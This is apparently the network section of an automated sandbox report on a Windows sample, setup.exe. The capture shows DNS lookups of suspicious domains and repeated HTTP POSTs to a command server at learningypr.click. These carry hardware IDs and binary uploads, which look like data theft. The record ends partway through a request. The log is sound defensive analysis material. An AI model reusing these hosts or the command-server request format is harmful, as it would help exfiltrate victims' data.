                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131051064 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131086111 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131089926 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131114006 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131127119 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131221056 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131233931 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131277084 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131280899 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131337881 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131550074 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131567001 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131603956 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131608009 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131633997 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131653070 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131858110 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131870985 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131910086 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131913900 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131942987 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131942987 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132143021 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132174015 CET44349746172.67.208.58192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 19:10:11.827198029 CET | 56165 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 19:10:11.839168072 CET | 53 | 56165 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 19:10:29.106033087 CET | 64745 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 19:10:29.165052891 CET | 53 | 64745 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 19:10:30.205308914 CET | 56562 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 19:10:30.218369007 CET | 53 | 56562 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 19:10:30.817960024 CET | 51873 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 19:10:30.827205896 CET | 53 | 51873 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 19:10:11.827198029 CET | 192.168.2.4 | 1.1.1.1 | 0x77a3 | Standard query (0) | learningypr.click | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:29.106033087 CET | 192.168.2.4 | 1.1.1.1 | 0xc444 | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:30.205308914 CET | 192.168.2.4 | 1.1.1.1 | 0xf942 | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:30.817960024 CET | 192.168.2.4 | 1.1.1.1 | 0x6973 | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:11.839168072 CET | 1.1.1.1 | 192.168.2.4 | 0x77a3 | No error (0) | learningypr.click | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:29.165052891 CET | 1.1.1.1 | 192.168.2.4 | 0xc444 | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:30.218369007 CET | 1.1.1.1 | 192.168.2.4 | 0xf942 | No error (0) | klipvumisui.shop | | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:30.218369007 CET | 1.1.1.1 | 192.168.2.4 | 0xf942 | No error (0) | klipvumisui.shop | | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:10:30.827205896 CET | 1.1.1.1 | 192.168.2.4 | 0x6973 | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                • learningypr.click
                                                                                                                                                                                                                                • cegu.shop
                                                                                                                                                                                                                                • klipvumisui.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:12 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                Host: learningypr.click
2024-12-30 18:10:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-30 18:10:12 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=h2lp9ki53gvd9t6oikc5vdim32; expires=Fri, 25 Apr 2025 11:56:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YwikyTY3usRt8thjb68%2BieawodxWOI0aWqwCRypTkV157cRlVXo3PuMmMhmwc6g5cws6nvPN5yn70GjfKxxDqH2iJXTMrapCVHGM7sTrsl7jeFshdB955Owa%2FsTegLDxsq2e%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc3bcfb58cda-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1817&rtt_var=709&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1512953&cwnd=242&unsent_bytes=0&cid=357708305d3648be&ts=503&x=0"
2024-12-30 18:10:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok
2024-12-30 18:10:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:13 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 78
                                                                                                                                                                                                                                Host: learningypr.click
2024-12-30 18:10:13 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397
2024-12-30 18:10:13 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ejm978dbr9468tmcg9uticf47v; expires=Fri, 25 Apr 2025 11:56:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2BoBz6518y43Ud1q0d6COkHR2UOE6dXrfo4gtydCBcUxmk%2FnCGNJyel1g64USOCbjLINcbf9L527StBaA9pjPIwKC4X8WI099KSvz4q%2FO5IpAx9F0WS0liPeenMo0aOhTi5YHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc418ddb41a6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1633&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=979&delivery_rate=1761158&cwnd=239&unsent_bytes=0&cid=66a2567a93f3130d&ts=478&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:14 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=RVM1PD4RW0Q7YUQJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 18150
                                                                                                                                                                                                                                Host: learningypr.click
2024-12-30 18:10:14 UTC | 15331 | OUT | Data Raw: 2d 2d 52 56 4d 31 50 44 34 52 57 30 51 37 59 55 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 52 56 4d 31 50 44 34 52 57 30 51 37 59 55 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 56 4d 31 50 44 34 52 57 30 51 37 59 55 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 52 56 4d
                                                                                                                                                                                                                                Data Ascii: --RVM1PD4RW0Q7YUQJContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--RVM1PD4RW0Q7YUQJContent-Disposition: form-data; name="pid"2--RVM1PD4RW0Q7YUQJContent-Disposition: form-data; name="lid"hRjzG3--DRON--RVM
2024-12-30 18:10:14 UTC | 2819 | OUT | Data Raw: (binary data)
2024-12-30 18:10:15 UTC | 1143 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:15 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=35st2tp4822d2nnug0fqtgs755; expires=Fri, 25 Apr 2025 11:56:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6vD68239u55TXc6tL7vg5B%2FT5IOe72fafCfOGTuTtAW%2Fa9sYCEgnW%2FW4%2BEDgRSd%2FWwYh7RH%2BSWNhVK8BcCkKdJ2blo%2F9hysYEkzKVt%2Bk2j%2BKQD5P2IDMMKIxbpaEqutCOXNdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc495c344344-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1675&rtt_var=647&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19111&delivery_rate=1667618&cwnd=47&unsent_bytes=0&cid=026ba196026ca5c9&ts=659&x=0"
2024-12-30 18:10:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 18:10:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:15 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=KKG02N6EU
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 8729
                                                                                                                                                                                                                                Host: learningypr.click
2024-12-30 18:10:15 UTC | 8729 | OUT | Data Ascii: --KKG02N6EUContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--KKG02N6EUContent-Disposition: form-data; name="pid"2--KKG02N6EUContent-Disposition: form-data; name="lid"hRjzG3--DRON--KKG02N6EUContent-Dispo
2024-12-30 18:10:16 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=s4g86liraq4pgccmevk940b6l7; expires=Fri, 25 Apr 2025 11:56:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0yT3ywByh13Jhe%2BGtOtfJBsq2wy7LE52CzfJ42b5hNhidrAWvWtHgPid7Hz4lBqL7F5w3S3v69%2BjMl5alu6fPiHk%2Fj%2Btj6ZThrmxjnCnkPZ58gE26akc%2F3wXk5sHqEA0FL0sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc51d94b41a6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9660&delivery_rate=1798029&cwnd=239&unsent_bytes=0&cid=91044bda7141bd21&ts=645&x=0"
2024-12-30 18:10:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 18:10:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:17 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=POEN4VU2
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 20376
                                                                                                                                                                                                                                Host: learningypr.click
2024-12-30 18:10:17 UTC | 15331 | OUT | Data Ascii: --POEN4VU2Content-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--POEN4VU2Content-Disposition: form-data; name="pid"3--POEN4VU2Content-Disposition: form-data; name="lid"hRjzG3--DRON--POEN4VU2Content-Dispositi
2024-12-30 18:10:17 UTC | 5045 | OUT | Data Raw: (binary data)
2024-12-30 18:10:19 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:19 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=8vt32gbnmgsu9rbi7ip98u61mg; expires=Fri, 25 Apr 2025 11:56:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLWUuQLXzJIzkaU2rQIxmP6X8GE6Id0q8GGK6JiCWZ481NjQwTIv6pvdBwKvXJGkXZpB6vUYH2jCG1cAKmlWz8HnyoLuugiuGv%2BKR9jDoa4C1slOf0Y4Ul5HAyiGgO4CWwjeag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc5a68e972b9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1799&rtt_var=973&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21329&delivery_rate=975935&cwnd=214&unsent_bytes=0&cid=456d8d22d706bb0f&ts=2330&x=0"
2024-12-30 18:10:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 18:10:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:20 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=Z88PPM2L
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 7069
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:20 UTC7069OUTData Raw: 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 5a 38 38 50 50 4d 32 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                Data Ascii: --Z88PPM2LContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--Z88PPM2LContent-Disposition: form-data; name="pid"1--Z88PPM2LContent-Disposition: form-data; name="lid"hRjzG3--DRON--Z88PPM2LContent-Dispositi
2024-12-30 18:10:21 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=r1u59o5hb4j83ofq1i152lrcj5; expires=Fri, 25 Apr 2025 11:56:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdc2xwQCaq1%2Bm13TVJnOsfqUnSu9KDWiY1YvWfBwun2WmDVYAbk9qyewQIyxd91DxIIf%2BnLImqCF3VyZjG6gQGl2KXkVd52rlhrv0vdfDGcWnozSpLClRhOZjm%2BJ%2Fbs3ppOHSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc6f2ba31875-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1639&rtt_var=625&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2841&recv_bytes=7977&delivery_rate=1736028&cwnd=153&unsent_bytes=0&cid=a7b3cd71e8d7e060&ts=477&x=0"
2024-12-30 18:10:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 18:10:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:21 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=HXTEUTBDR7M2M2TJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 1243
                                                                                                                                                                                                                                Host: learningypr.click
